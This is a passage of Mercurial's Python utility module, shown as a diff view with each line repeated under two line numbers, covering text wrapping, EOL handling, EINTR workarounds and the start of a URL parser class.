2282 (10, 1 << 20, _('%.1f MB')),
2286 (1, 1 << 20, _('%.2f MB')),
2283 (1, 1 << 20, _('%.2f MB')),
2287 (100, 1 << 10, _('%.0f KB')),
2284 (100, 1 << 10, _('%.0f KB')),
2288 (10, 1 << 10, _('%.1f KB')),
2285 (10, 1 << 10, _('%.1f KB')),
2289 (1, 1 << 10, _('%.2f KB')),
2286 (1, 1 << 10, _('%.2f KB')),
2290 (1, 1, _('%.0f bytes')),
2287 (1, 1, _('%.0f bytes')),
2291 )
2288 )
2292
2289
2293 # Matches a single EOL which can either be a CRLF where repeated CR
2290 # Matches a single EOL which can either be a CRLF where repeated CR
2294 # are removed or a LF. We do not care about old Macintosh files, so a
2291 # are removed or a LF. We do not care about old Macintosh files, so a
2295 # stray CR is an error.
2292 # stray CR is an error.
2296 _eolre = remod.compile(br'\r*\n')
2293 _eolre = remod.compile(br'\r*\n')
2297
2294
2298 def tolf(s):
2295 def tolf(s):
2299 return _eolre.sub('\n', s)
2296 return _eolre.sub('\n', s)
2300
2297
2301 def tocrlf(s):
2298 def tocrlf(s):
2302 return _eolre.sub('\r\n', s)
2299 return _eolre.sub('\r\n', s)
2303
2300
2304 if pycompat.oslinesep == '\r\n':
2301 if pycompat.oslinesep == '\r\n':
2305 tonativeeol = tocrlf
2302 tonativeeol = tocrlf
2306 fromnativeeol = tolf
2303 fromnativeeol = tolf
2307 else:
2304 else:
2308 tonativeeol = pycompat.identity
2305 tonativeeol = pycompat.identity
2309 fromnativeeol = pycompat.identity
2306 fromnativeeol = pycompat.identity
2310
2307
2311 def escapestr(s):
2308 def escapestr(s):
2312 # call underlying function of s.encode('string_escape') directly for
2309 # call underlying function of s.encode('string_escape') directly for
2313 # Python 3 compatibility
2310 # Python 3 compatibility
2314 return codecs.escape_encode(s)[0]
2311 return codecs.escape_encode(s)[0]
2315
2312
2316 def unescapestr(s):
2313 def unescapestr(s):
2317 return codecs.escape_decode(s)[0]
2314 return codecs.escape_decode(s)[0]
2318
2315
2319 def forcebytestr(obj):
2316 def forcebytestr(obj):
2320 """Portably format an arbitrary object (e.g. exception) into a byte
2317 """Portably format an arbitrary object (e.g. exception) into a byte
2321 string."""
2318 string."""
2322 try:
2319 try:
2323 return pycompat.bytestr(obj)
2320 return pycompat.bytestr(obj)
2324 except UnicodeEncodeError:
2321 except UnicodeEncodeError:
2325 # non-ascii string, may be lossy
2322 # non-ascii string, may be lossy
2326 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2323 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2327
2324
2328 def uirepr(s):
2325 def uirepr(s):
2329 # Avoid double backslash in Windows path repr()
2326 # Avoid double backslash in Windows path repr()
2330 return repr(s).replace('\\\\', '\\')
2327 return repr(s).replace('\\\\', '\\')
2331
2328
2332 # delay import of textwrap
2329 # delay import of textwrap
2333 def MBTextWrapper(**kwargs):
2330 def MBTextWrapper(**kwargs):
2334 class tw(textwrap.TextWrapper):
2331 class tw(textwrap.TextWrapper):
2335 """
2332 """
2336 Extend TextWrapper for width-awareness.
2333 Extend TextWrapper for width-awareness.
2337
2334
2338 Neither number of 'bytes' in any encoding nor 'characters' is
2335 Neither number of 'bytes' in any encoding nor 'characters' is
2339 appropriate to calculate terminal columns for specified string.
2336 appropriate to calculate terminal columns for specified string.
2340
2337
2341 Original TextWrapper implementation uses built-in 'len()' directly,
2338 Original TextWrapper implementation uses built-in 'len()' directly,
2342 so overriding is needed to use width information of each characters.
2339 so overriding is needed to use width information of each characters.
2343
2340
2344 In addition, characters classified into 'ambiguous' width are
2341 In addition, characters classified into 'ambiguous' width are
2345 treated as wide in East Asian area, but as narrow in other.
2342 treated as wide in East Asian area, but as narrow in other.
2346
2343
2347 This requires use decision to determine width of such characters.
2344 This requires use decision to determine width of such characters.
2348 """
2345 """
2349 def _cutdown(self, ucstr, space_left):
2346 def _cutdown(self, ucstr, space_left):
2350 l = 0
2347 l = 0
2351 colwidth = encoding.ucolwidth
2348 colwidth = encoding.ucolwidth
2352 for i in xrange(len(ucstr)):
2349 for i in xrange(len(ucstr)):
2353 l += colwidth(ucstr[i])
2350 l += colwidth(ucstr[i])
2354 if space_left < l:
2351 if space_left < l:
2355 return (ucstr[:i], ucstr[i:])
2352 return (ucstr[:i], ucstr[i:])
2356 return ucstr, ''
2353 return ucstr, ''
2357
2354
2358 # overriding of base class
2355 # overriding of base class
2359 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2356 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2360 space_left = max(width - cur_len, 1)
2357 space_left = max(width - cur_len, 1)
2361
2358
2362 if self.break_long_words:
2359 if self.break_long_words:
2363 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2360 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2364 cur_line.append(cut)
2361 cur_line.append(cut)
2365 reversed_chunks[-1] = res
2362 reversed_chunks[-1] = res
2366 elif not cur_line:
2363 elif not cur_line:
2367 cur_line.append(reversed_chunks.pop())
2364 cur_line.append(reversed_chunks.pop())
2368
2365
2369 # this overriding code is imported from TextWrapper of Python 2.6
2366 # this overriding code is imported from TextWrapper of Python 2.6
2370 # to calculate columns of string by 'encoding.ucolwidth()'
2367 # to calculate columns of string by 'encoding.ucolwidth()'
2371 def _wrap_chunks(self, chunks):
2368 def _wrap_chunks(self, chunks):
2372 colwidth = encoding.ucolwidth
2369 colwidth = encoding.ucolwidth
2373
2370
2374 lines = []
2371 lines = []
2375 if self.width <= 0:
2372 if self.width <= 0:
2376 raise ValueError("invalid width %r (must be > 0)" % self.width)
2373 raise ValueError("invalid width %r (must be > 0)" % self.width)
2377
2374
2378 # Arrange in reverse order so items can be efficiently popped
2375 # Arrange in reverse order so items can be efficiently popped
2379 # from a stack of chucks.
2376 # from a stack of chucks.
2380 chunks.reverse()
2377 chunks.reverse()
2381
2378
2382 while chunks:
2379 while chunks:
2383
2380
2384 # Start the list of chunks that will make up the current line.
2381 # Start the list of chunks that will make up the current line.
2385 # cur_len is just the length of all the chunks in cur_line.
2382 # cur_len is just the length of all the chunks in cur_line.
2386 cur_line = []
2383 cur_line = []
2387 cur_len = 0
2384 cur_len = 0
2388
2385
2389 # Figure out which static string will prefix this line.
2386 # Figure out which static string will prefix this line.
2390 if lines:
2387 if lines:
2391 indent = self.subsequent_indent
2388 indent = self.subsequent_indent
2392 else:
2389 else:
2393 indent = self.initial_indent
2390 indent = self.initial_indent
2394
2391
2395 # Maximum width for this line.
2392 # Maximum width for this line.
2396 width = self.width - len(indent)
2393 width = self.width - len(indent)
2397
2394
2398 # First chunk on line is whitespace -- drop it, unless this
2395 # First chunk on line is whitespace -- drop it, unless this
2399 # is the very beginning of the text (i.e. no lines started yet).
2396 # is the very beginning of the text (i.e. no lines started yet).
2400 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2397 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2401 del chunks[-1]
2398 del chunks[-1]
2402
2399
2403 while chunks:
2400 while chunks:
2404 l = colwidth(chunks[-1])
2401 l = colwidth(chunks[-1])
2405
2402
2406 # Can at least squeeze this chunk onto the current line.
2403 # Can at least squeeze this chunk onto the current line.
2407 if cur_len + l <= width:
2404 if cur_len + l <= width:
2408 cur_line.append(chunks.pop())
2405 cur_line.append(chunks.pop())
2409 cur_len += l
2406 cur_len += l
2410
2407
2411 # Nope, this line is full.
2408 # Nope, this line is full.
2412 else:
2409 else:
2413 break
2410 break
2414
2411
2415 # The current line is full, and the next chunk is too big to
2412 # The current line is full, and the next chunk is too big to
2416 # fit on *any* line (not just this one).
2413 # fit on *any* line (not just this one).
2417 if chunks and colwidth(chunks[-1]) > width:
2414 if chunks and colwidth(chunks[-1]) > width:
2418 self._handle_long_word(chunks, cur_line, cur_len, width)
2415 self._handle_long_word(chunks, cur_line, cur_len, width)
2419
2416
2420 # If the last chunk on this line is all whitespace, drop it.
2417 # If the last chunk on this line is all whitespace, drop it.
2421 if (self.drop_whitespace and
2418 if (self.drop_whitespace and
2422 cur_line and cur_line[-1].strip() == r''):
2419 cur_line and cur_line[-1].strip() == r''):
2423 del cur_line[-1]
2420 del cur_line[-1]
2424
2421
2425 # Convert current line back to a string and store it in list
2422 # Convert current line back to a string and store it in list
2426 # of all lines (return value).
2423 # of all lines (return value).
2427 if cur_line:
2424 if cur_line:
2428 lines.append(indent + r''.join(cur_line))
2425 lines.append(indent + r''.join(cur_line))
2429
2426
2430 return lines
2427 return lines
2431
2428
2432 global MBTextWrapper
2429 global MBTextWrapper
2433 MBTextWrapper = tw
2430 MBTextWrapper = tw
2434 return tw(**kwargs)
2431 return tw(**kwargs)
2435
2432
2436 def wrap(line, width, initindent='', hangindent=''):
2433 def wrap(line, width, initindent='', hangindent=''):
2437 maxindent = max(len(hangindent), len(initindent))
2434 maxindent = max(len(hangindent), len(initindent))
2438 if width <= maxindent:
2435 if width <= maxindent:
2439 # adjust for weird terminal size
2436 # adjust for weird terminal size
2440 width = max(78, maxindent + 1)
2437 width = max(78, maxindent + 1)
2441 line = line.decode(pycompat.sysstr(encoding.encoding),
2438 line = line.decode(pycompat.sysstr(encoding.encoding),
2442 pycompat.sysstr(encoding.encodingmode))
2439 pycompat.sysstr(encoding.encodingmode))
2443 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2440 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2444 pycompat.sysstr(encoding.encodingmode))
2441 pycompat.sysstr(encoding.encodingmode))
2445 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2442 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2446 pycompat.sysstr(encoding.encodingmode))
2443 pycompat.sysstr(encoding.encodingmode))
2447 wrapper = MBTextWrapper(width=width,
2444 wrapper = MBTextWrapper(width=width,
2448 initial_indent=initindent,
2445 initial_indent=initindent,
2449 subsequent_indent=hangindent)
2446 subsequent_indent=hangindent)
2450 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2447 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2451
2448
2452 if (pyplatform.python_implementation() == 'CPython' and
2449 if (pyplatform.python_implementation() == 'CPython' and
2453 sys.version_info < (3, 0)):
2450 sys.version_info < (3, 0)):
2454 # There is an issue in CPython that some IO methods do not handle EINTR
2451 # There is an issue in CPython that some IO methods do not handle EINTR
2455 # correctly. The following table shows what CPython version (and functions)
2452 # correctly. The following table shows what CPython version (and functions)
2456 # are affected (buggy: has the EINTR bug, okay: otherwise):
2453 # are affected (buggy: has the EINTR bug, okay: otherwise):
2457 #
2454 #
2458 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2455 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2459 # --------------------------------------------------
2456 # --------------------------------------------------
2460 # fp.__iter__ | buggy | buggy | okay
2457 # fp.__iter__ | buggy | buggy | okay
2461 # fp.read* | buggy | okay [1] | okay
2458 # fp.read* | buggy | okay [1] | okay
2462 #
2459 #
2463 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2460 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2464 #
2461 #
2465 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2462 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2466 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2463 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2467 #
2464 #
2468 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2465 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2469 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2466 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2470 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2467 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2471 # fp.__iter__ but not other fp.read* methods.
2468 # fp.__iter__ but not other fp.read* methods.
2472 #
2469 #
2473 # On modern systems like Linux, the "read" syscall cannot be interrupted
2470 # On modern systems like Linux, the "read" syscall cannot be interrupted
2474 # when reading "fast" files like on-disk files. So the EINTR issue only
2471 # when reading "fast" files like on-disk files. So the EINTR issue only
2475 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2472 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2476 # files approximately as "fast" files and use the fast (unsafe) code path,
2473 # files approximately as "fast" files and use the fast (unsafe) code path,
2477 # to minimize the performance impact.
2474 # to minimize the performance impact.
2478 if sys.version_info >= (2, 7, 4):
2475 if sys.version_info >= (2, 7, 4):
2479 # fp.readline deals with EINTR correctly, use it as a workaround.
2476 # fp.readline deals with EINTR correctly, use it as a workaround.
2480 def _safeiterfile(fp):
2477 def _safeiterfile(fp):
2481 return iter(fp.readline, '')
2478 return iter(fp.readline, '')
2482 else:
2479 else:
2483 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2480 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2484 # note: this may block longer than necessary because of bufsize.
2481 # note: this may block longer than necessary because of bufsize.
2485 def _safeiterfile(fp, bufsize=4096):
2482 def _safeiterfile(fp, bufsize=4096):
2486 fd = fp.fileno()
2483 fd = fp.fileno()
2487 line = ''
2484 line = ''
2488 while True:
2485 while True:
2489 try:
2486 try:
2490 buf = os.read(fd, bufsize)
2487 buf = os.read(fd, bufsize)
2491 except OSError as ex:
2488 except OSError as ex:
2492 # os.read only raises EINTR before any data is read
2489 # os.read only raises EINTR before any data is read
2493 if ex.errno == errno.EINTR:
2490 if ex.errno == errno.EINTR:
2494 continue
2491 continue
2495 else:
2492 else:
2496 raise
2493 raise
2497 line += buf
2494 line += buf
2498 if '\n' in buf:
2495 if '\n' in buf:
2499 splitted = line.splitlines(True)
2496 splitted = line.splitlines(True)
2500 line = ''
2497 line = ''
2501 for l in splitted:
2498 for l in splitted:
2502 if l[-1] == '\n':
2499 if l[-1] == '\n':
2503 yield l
2500 yield l
2504 else:
2501 else:
2505 line = l
2502 line = l
2506 if not buf:
2503 if not buf:
2507 break
2504 break
2508 if line:
2505 if line:
2509 yield line
2506 yield line
2510
2507
2511 def iterfile(fp):
2508 def iterfile(fp):
2512 fastpath = True
2509 fastpath = True
2513 if type(fp) is file:
2510 if type(fp) is file:
2514 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2511 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2515 if fastpath:
2512 if fastpath:
2516 return fp
2513 return fp
2517 else:
2514 else:
2518 return _safeiterfile(fp)
2515 return _safeiterfile(fp)
2519 else:
2516 else:
2520 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2517 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2521 def iterfile(fp):
2518 def iterfile(fp):
2522 return fp
2519 return fp
2523
2520
2524 def iterlines(iterator):
2521 def iterlines(iterator):
2525 for chunk in iterator:
2522 for chunk in iterator:
2526 for line in chunk.splitlines():
2523 for line in chunk.splitlines():
2527 yield line
2524 yield line
2528
2525
2529 def expandpath(path):
2526 def expandpath(path):
2530 return os.path.expanduser(os.path.expandvars(path))
2527 return os.path.expanduser(os.path.expandvars(path))
2531
2528
2532 def hgcmd():
2529 def hgcmd():
2533 """Return the command used to execute current hg
2530 """Return the command used to execute current hg
2534
2531
2535 This is different from hgexecutable() because on Windows we want
2532 This is different from hgexecutable() because on Windows we want
2536 to avoid things opening new shell windows like batch files, so we
2533 to avoid things opening new shell windows like batch files, so we
2537 get either the python call or current executable.
2534 get either the python call or current executable.
2538 """
2535 """
2539 if mainfrozen():
2536 if mainfrozen():
2540 if getattr(sys, 'frozen', None) == 'macosx_app':
2537 if getattr(sys, 'frozen', None) == 'macosx_app':
2541 # Env variable set by py2app
2538 # Env variable set by py2app
2542 return [encoding.environ['EXECUTABLEPATH']]
2539 return [encoding.environ['EXECUTABLEPATH']]
2543 else:
2540 else:
2544 return [pycompat.sysexecutable]
2541 return [pycompat.sysexecutable]
2545 return gethgcmd()
2542 return gethgcmd()
2546
2543
2547 def rundetached(args, condfn):
2544 def rundetached(args, condfn):
2548 """Execute the argument list in a detached process.
2545 """Execute the argument list in a detached process.
2549
2546
2550 condfn is a callable which is called repeatedly and should return
2547 condfn is a callable which is called repeatedly and should return
2551 True once the child process is known to have started successfully.
2548 True once the child process is known to have started successfully.
2552 At this point, the child process PID is returned. If the child
2549 At this point, the child process PID is returned. If the child
2553 process fails to start or finishes before condfn() evaluates to
2550 process fails to start or finishes before condfn() evaluates to
2554 True, return -1.
2551 True, return -1.
2555 """
2552 """
2556 # Windows case is easier because the child process is either
2553 # Windows case is easier because the child process is either
2557 # successfully starting and validating the condition or exiting
2554 # successfully starting and validating the condition or exiting
2558 # on failure. We just poll on its PID. On Unix, if the child
2555 # on failure. We just poll on its PID. On Unix, if the child
2559 # process fails to start, it will be left in a zombie state until
2556 # process fails to start, it will be left in a zombie state until
2560 # the parent wait on it, which we cannot do since we expect a long
2557 # the parent wait on it, which we cannot do since we expect a long
2561 # running process on success. Instead we listen for SIGCHLD telling
2558 # running process on success. Instead we listen for SIGCHLD telling
2562 # us our child process terminated.
2559 # us our child process terminated.
2563 terminated = set()
2560 terminated = set()
2564 def handler(signum, frame):
2561 def handler(signum, frame):
2565 terminated.add(os.wait())
2562 terminated.add(os.wait())
2566 prevhandler = None
2563 prevhandler = None
2567 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2564 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2568 if SIGCHLD is not None:
2565 if SIGCHLD is not None:
2569 prevhandler = signal.signal(SIGCHLD, handler)
2566 prevhandler = signal.signal(SIGCHLD, handler)
2570 try:
2567 try:
2571 pid = spawndetached(args)
2568 pid = spawndetached(args)
2572 while not condfn():
2569 while not condfn():
2573 if ((pid in terminated or not testpid(pid))
2570 if ((pid in terminated or not testpid(pid))
2574 and not condfn()):
2571 and not condfn()):
2575 return -1
2572 return -1
2576 time.sleep(0.1)
2573 time.sleep(0.1)
2577 return pid
2574 return pid
2578 finally:
2575 finally:
2579 if prevhandler is not None:
2576 if prevhandler is not None:
2580 signal.signal(signal.SIGCHLD, prevhandler)
2577 signal.signal(signal.SIGCHLD, prevhandler)
2581
2578
2582 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2579 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2583 """Return the result of interpolating items in the mapping into string s.
2580 """Return the result of interpolating items in the mapping into string s.
2584
2581
2585 prefix is a single character string, or a two character string with
2582 prefix is a single character string, or a two character string with
2586 a backslash as the first character if the prefix needs to be escaped in
2583 a backslash as the first character if the prefix needs to be escaped in
2587 a regular expression.
2584 a regular expression.
2588
2585
2589 fn is an optional function that will be applied to the replacement text
2586 fn is an optional function that will be applied to the replacement text
2590 just before replacement.
2587 just before replacement.
2591
2588
2592 escape_prefix is an optional flag that allows using doubled prefix for
2589 escape_prefix is an optional flag that allows using doubled prefix for
2593 its escaping.
2590 its escaping.
2594 """
2591 """
2595 fn = fn or (lambda s: s)
2592 fn = fn or (lambda s: s)
2596 patterns = '|'.join(mapping.keys())
2593 patterns = '|'.join(mapping.keys())
2597 if escape_prefix:
2594 if escape_prefix:
2598 patterns += '|' + prefix
2595 patterns += '|' + prefix
2599 if len(prefix) > 1:
2596 if len(prefix) > 1:
2600 prefix_char = prefix[1:]
2597 prefix_char = prefix[1:]
2601 else:
2598 else:
2602 prefix_char = prefix
2599 prefix_char = prefix
2603 mapping[prefix_char] = prefix_char
2600 mapping[prefix_char] = prefix_char
2604 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2601 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2605 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2602 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2606
2603
2607 def getport(port):
2604 def getport(port):
2608 """Return the port for a given network service.
2605 """Return the port for a given network service.
2609
2606
2610 If port is an integer, it's returned as is. If it's a string, it's
2607 If port is an integer, it's returned as is. If it's a string, it's
2611 looked up using socket.getservbyname(). If there's no matching
2608 looked up using socket.getservbyname(). If there's no matching
2612 service, error.Abort is raised.
2609 service, error.Abort is raised.
2613 """
2610 """
2614 try:
2611 try:
2615 return int(port)
2612 return int(port)
2616 except ValueError:
2613 except ValueError:
2617 pass
2614 pass
2618
2615
2619 try:
2616 try:
2620 return socket.getservbyname(port)
2617 return socket.getservbyname(port)
2621 except socket.error:
2618 except socket.error:
2622 raise Abort(_("no port number associated with service '%s'") % port)
2619 raise Abort(_("no port number associated with service '%s'") % port)
2623
2620
2624 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2621 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2625 '0': False, 'no': False, 'false': False, 'off': False,
2622 '0': False, 'no': False, 'false': False, 'off': False,
2626 'never': False}
2623 'never': False}
2627
2624
2628 def parsebool(s):
2625 def parsebool(s):
2629 """Parse s into a boolean.
2626 """Parse s into a boolean.
2630
2627
2631 If s is not a valid boolean, returns None.
2628 If s is not a valid boolean, returns None.
2632 """
2629 """
2633 return _booleans.get(s.lower(), None)
2630 return _booleans.get(s.lower(), None)
2634
2631
2635 _hextochr = dict((a + b, chr(int(a + b, 16)))
2632 _hextochr = dict((a + b, chr(int(a + b, 16)))
2636 for a in string.hexdigits for b in string.hexdigits)
2633 for a in string.hexdigits for b in string.hexdigits)
2637
2634
2638 class url(object):
2635 class url(object):
2639 r"""Reliable URL parser.
2636 r"""Reliable URL parser.
2640
2637
2641 This parses URLs and provides attributes for the following
2638 This parses URLs and provides attributes for the following
2642 components:
2639 components:
2643
2640
2644 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2645
2642
2646 Missing components are set to None. The only exception is
2643 Missing components are set to None. The only exception is
2647 fragment, which is set to '' if present but empty.
2644 fragment, which is set to '' if present but empty.
2648
2645
2649 If parsefragment is False, fragment is included in query. If
2646 If parsefragment is False, fragment is included in query. If
2650 parsequery is False, query is included in path. If both are
2647 parsequery is False, query is included in path. If both are
2651 False, both fragment and query are included in path.
2648 False, both fragment and query are included in path.
2652
2649
2653 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2654
2651
2655 Note that for backward compatibility reasons, bundle URLs do not
2652 Note that for backward compatibility reasons, bundle URLs do not
2656 take host names. That means 'bundle://../' has a path of '../'.
2653 take host names. That means 'bundle://../' has a path of '../'.
2657
2654
2658 Examples:
2655 Examples:
2659
2656
2660 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2657 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2661 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2662 >>> url('ssh://[::1]:2200//home/joe/repo')
2659 >>> url('ssh://[::1]:2200//home/joe/repo')
2663 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2664 >>> url('file:///home/joe/repo')
2661 >>> url('file:///home/joe/repo')
2665 <url scheme: 'file', path: '/home/joe/repo'>
2662 <url scheme: 'file', path: '/home/joe/repo'>
2666 >>> url('file:///c:/temp/foo/')
2663 >>> url('file:///c:/temp/foo/')
2667 <url scheme: 'file', path: 'c:/temp/foo/'>
2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2668 >>> url('bundle:foo')
2665 >>> url('bundle:foo')
2669 <url scheme: 'bundle', path: 'foo'>
2666 <url scheme: 'bundle', path: 'foo'>
2670 >>> url('bundle://../foo')
2667 >>> url('bundle://../foo')
2671 <url scheme: 'bundle', path: '../foo'>
2668 <url scheme: 'bundle', path: '../foo'>
2672 >>> url(r'c:\foo\bar')
2669 >>> url(r'c:\foo\bar')
2673 <url path: 'c:\\foo\\bar'>
2670 <url path: 'c:\\foo\\bar'>
2674 >>> url(r'\\blah\blah\blah')
2671 >>> url(r'\\blah\blah\blah')
2675 <url path: '\\\\blah\\blah\\blah'>
2672 <url path: '\\\\blah\\blah\\blah'>
2676 >>> url(r'\\blah\blah\blah#baz')
2673 >>> url(r'\\blah\blah\blah#baz')
2677 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2678 >>> url(r'file:///C:\users\me')
2675 >>> url(r'file:///C:\users\me')
2679 <url scheme: 'file', path: 'C:\\users\\me'>
2676 <url scheme: 'file', path: 'C:\\users\\me'>
2680
2677
2681 Authentication credentials:
2678 Authentication credentials:
2682
2679
2683 >>> url('ssh://joe:xyz@x/repo')
2680 >>> url('ssh://joe:xyz@x/repo')
2684 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2685 >>> url('ssh://joe@x/repo')
2682 >>> url('ssh://joe@x/repo')
2686 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2687
2684
2688 Query strings and fragments:
2685 Query strings and fragments:
2689
2686
2690 >>> url('http://host/a?b#c')
2687 >>> url('http://host/a?b#c')
2691 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2692 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2689 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2693 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2694
2691
2695 Empty path:
2692 Empty path:
2696
2693
2697 >>> url('')
2694 >>> url('')
2698 <url path: ''>
2695 <url path: ''>
2699 >>> url('#a')
2696 >>> url('#a')
2700 <url path: '', fragment: 'a'>
2697 <url path: '', fragment: 'a'>
2701 >>> url('http://host/')
2698 >>> url('http://host/')
2702 <url scheme: 'http', host: 'host', path: ''>
2699 <url scheme: 'http', host: 'host', path: ''>
2703 >>> url('http://host/#a')
2700 >>> url('http://host/#a')
2704 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2705
2702
2706 Only scheme:
2703 Only scheme:
2707
2704
2708 >>> url('http:')
2705 >>> url('http:')
2709 <url scheme: 'http'>
2706 <url scheme: 'http'>
2710 """
2707 """
2711
2708
2712 _safechars = "!~*'()+"
2709 _safechars = "!~*'()+"
2713 _safepchars = "/!~*'()+:\\"
2710 _safepchars = "/!~*'()+:\\"
2714 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2715
2712
2716 def __init__(self, path, parsequery=True, parsefragment=True):
2713 def __init__(self, path, parsequery=True, parsefragment=True):
2717 # We slowly chomp away at path until we have only the path left
2714 # We slowly chomp away at path until we have only the path left
2718 self.scheme = self.user = self.passwd = self.host = None
2715 self.scheme = self.user = self.passwd = self.host = None
2719 self.port = self.path = self.query = self.fragment = None
2716 self.port = self.path = self.query = self.fragment = None
2720 self._localpath = True
2717 self._localpath = True
2721 self._hostport = ''
2718 self._hostport = ''
2722 self._origpath = path
2719 self._origpath = path
2723
2720
2724 if parsefragment and '#' in path:
2721 if parsefragment and '#' in path:
2725 path, self.fragment = path.split('#', 1)
2722 path, self.fragment = path.split('#', 1)
2726
2723
2727 # special case for Windows drive letters and UNC paths
2724 # special case for Windows drive letters and UNC paths
2728 if hasdriveletter(path) or path.startswith('\\\\'):
2725 if hasdriveletter(path) or path.startswith('\\\\'):
2729 self.path = path
2726 self.path = path
2730 return
2727 return
2731
2728
2732 # For compatibility reasons, we can't handle bundle paths as
2729 # For compatibility reasons, we can't handle bundle paths as
2733 # normal URLS
2730 # normal URLS
2734 if path.startswith('bundle:'):
2731 if path.startswith('bundle:'):
2735 self.scheme = 'bundle'
2732 self.scheme = 'bundle'
2736 path = path[7:]
2733 path = path[7:]
2737 if path.startswith('//'):
2734 if path.startswith('//'):
2738 path = path[2:]
2735 path = path[2:]
2739 self.path = path
2736 self.path = path
2740 return
2737 return
2741
2738
2742 if self._matchscheme(path):
2739 if self._matchscheme(path):
2743 parts = path.split(':', 1)
2740 parts = path.split(':', 1)
2744 if parts[0]:
2741 if parts[0]:
2745 self.scheme, path = parts
2742 self.scheme, path = parts
2746 self._localpath = False
2743 self._localpath = False
2747
2744
2748 if not path:
2745 if not path:
2749 path = None
2746 path = None
2750 if self._localpath:
2747 if self._localpath:
2751 self.path = ''
2748 self.path = ''
2752 return
2749 return
2753 else:
2750 else:
2754 if self._localpath:
2751 if self._localpath:
2755 self.path = path
2752 self.path = path
2756 return
2753 return
2757
2754
2758 if parsequery and '?' in path:
2755 if parsequery and '?' in path:
2759 path, self.query = path.split('?', 1)
2756 path, self.query = path.split('?', 1)
2760 if not path:
2757 if not path:
2761 path = None
2758 path = None
2762 if not self.query:
2759 if not self.query:
2763 self.query = None
2760 self.query = None
2764
2761
2765 # // is required to specify a host/authority
2762 # // is required to specify a host/authority
2766 if path and path.startswith('//'):
2763 if path and path.startswith('//'):
2767 parts = path[2:].split('/', 1)
2764 parts = path[2:].split('/', 1)
2768 if len(parts) > 1:
2765 if len(parts) > 1:
2769 self.host, path = parts
2766 self.host, path = parts
2770 else:
2767 else:
2771 self.host = parts[0]
2768 self.host = parts[0]
